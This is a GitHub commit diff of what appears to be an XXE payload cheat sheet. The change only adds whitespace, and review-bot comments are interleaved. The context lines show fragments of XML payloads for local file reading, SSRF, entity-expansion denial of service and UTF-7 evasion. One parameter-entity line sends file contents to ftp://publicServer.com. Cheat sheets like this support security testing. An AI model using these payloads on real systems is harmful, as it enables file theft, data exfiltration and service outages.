Update xxe.md

EdOverflow 2018-01-19 11:35:33 +01:00 committed by GitHub
parent 47c3292888
commit a2068b0f01
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -1,4 +1,5 @@
**LFI Test** **LFI Test**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
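Review bot: The commit message "Update xxe.md" does not say what changed, and in this hunk the line counts (4 lines before, 5 after) show one added line while the visible text is identical on both sides, so the change appears to be whitespace only. Suggest a message that states this, for example that a blank line was added after each bold heading, if that is the intent.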
@ -7,6 +8,7 @@
``` ```
**Blind LFI test (when first case doesn't return anything)** **Blind LFI test (when first case doesn't return anything)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
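Review bot: The opening fence after the "Blind LFI test" heading has no language tag. Since the lines around each heading are being touched anyway, tagging the fences as xml would give syntax highlighting and make the samples easier to read; the same applies to the other fences in this file.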
@ -16,6 +18,7 @@
``` ```
**Access Control bypass (loading restricted resources - PHP example)** **Access Control bypass (loading restricted resources - PHP example)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -24,6 +27,7 @@
``` ```
**SSRF Test** **SSRF Test**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -32,6 +36,7 @@
``` ```
**XEE (XML Entity Expansion - DOS)** **XEE (XML Entity Expansion - DOS)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE lolz [ <!DOCTYPE lolz [
@ -51,12 +56,14 @@
``` ```
**XEE #2 (Remote attack - through external xml inclusion)** **XEE #2 (Remote attack - through external xml inclusion)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE lolz [ <!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]> <!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz> <lolz><lol>3..2..1...&test<lol></lolz>
``` ```
**XXE FTP HTTP Server** **XXE FTP HTTP Server**
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
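Review bot: The XEE #2 sample in this hunk's context lines is not well-formed XML: the reference `&test` has no terminating semicolon, and the second `<lol>` is an opening tag where a closing `</lol>` is expected. A conforming parser rejects the document at the well-formedness stage, before any entity is resolved, so anyone using this sample to confirm that external entity loading is disabled in their parser would get a misleading result. Worth correcting in the same commit, since the surrounding lines are already being edited.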
@ -75,7 +82,9 @@ File stored on http://publicServer.com/parameterEntity_sendftp.dtd
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>"> <!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1; %param1;
``` ```
**XXE UTF-7** **XXE UTF-7**
``` ```
<?xml version="1.0" encoding="UTF-7"?> <?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
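Review bot: The "XXE UTF-7" heading at the end of this hunk has no explanation of what the `encoding="UTF-7"` declaration is for, unlike the earlier headings that carry a parenthetical description. A one-line description under the heading would help readers, along with the corresponding check: a parser should accept only the encodings the application actually expects.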